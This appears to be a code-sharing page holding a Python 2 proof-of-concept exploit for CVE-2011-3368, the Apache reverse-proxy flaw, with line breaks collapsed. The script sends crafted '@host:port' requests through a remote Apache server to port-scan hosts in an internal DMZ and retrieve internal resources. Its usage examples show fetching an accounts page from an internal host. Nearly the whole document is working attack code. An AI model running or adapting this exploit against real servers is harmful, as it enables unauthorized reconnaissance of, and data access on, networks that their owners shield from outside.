扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 |
#!/usr/bin/env python import socket import string import getopt, sys known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] def send_request(url, apache_target, apache_port, internal_target, internal_port, resource): get = "GET " + url + "@" + internal_target + ":" + internal_port +"/" + resource + " HTTP/1.1\r\n" get = get + "Host: " + apache_target + "\r\n\r\n" remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remoteserver.settimeout(3) try: remoteserver.connect((apache_target, int(apache_port))) remoteserver.send(get) return remoteserver.recv(4096) except: return "" def get_banner(result): return result[string.find(result, "\r\n\r\n")+4:] def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource): print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource) for port in tested_ports: port = str(port) result = send_request(url, apache_target, apache_port, internal_target, port, resource) if string.find(result,"HTTP/1.1 200")!=-1 or \ string.find(result,"HTTP/1.1 30")!=-1 or \ string.find(result,"HTTP/1.1 502")!=-1: print "- Open port: " + port + "/TCP" print get_banner(result) elif len(result)==0: print "- Filtered port: " + port + "/TCP" else: print "- Closed port: " + port + "/TCP" def usage(): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print "usage():" print "python apache_scan.py [options]" print print " [options]" print " -r: Remote Apache host" print " -p: Remote Apache port (default is 80)" print " -u: URL on the remote web server (default is /)" print " -d: Host in the DMZ (default is 127.0.0.1)" print " -e: Port in the DMZ (enables 'single port scan')" print " -g: GET request to the host in the DMZ (default is /)" print " -h: Help page" print print "examples:" print " - Port scan of the remote host" print " python apache_scan.py -r www.example.com -u /images/test.gif" print " - Port scan of a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local" print " - Retrieve a resource from a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html" print def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print " [+] Target: " + apache_target print " [+] Target port: " + apache_port print " [+] Internal host: " + internal_target print " [+] Tested ports: " + str(tested_ports) print " [+] Internal resource: " + resource print def main(): global apache_target global apache_port global url global internal_target global internal_port global resource try: opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"]) except getopt.GetoptError: usage() sys.exit(2) try: for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(2) if o == "-u": url=a if o == "-r": apache_target=a if o == "-p": apache_port=a if o == "-d": internal_target = a if o == "-e": internal_port=a if o == "-g": resource=a except getopt.GetoptError: usage() sys.exit(2) if apache_target == "": usage() sys.exit(2) url = "/" apache_target = "" apache_port = "80" internal_target = "127.0.0.1" internal_port = "" resource = "/" main() if internal_port!="": tested_ports = [internal_port] else: tested_ports = known_ports scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource) |
体验盒子
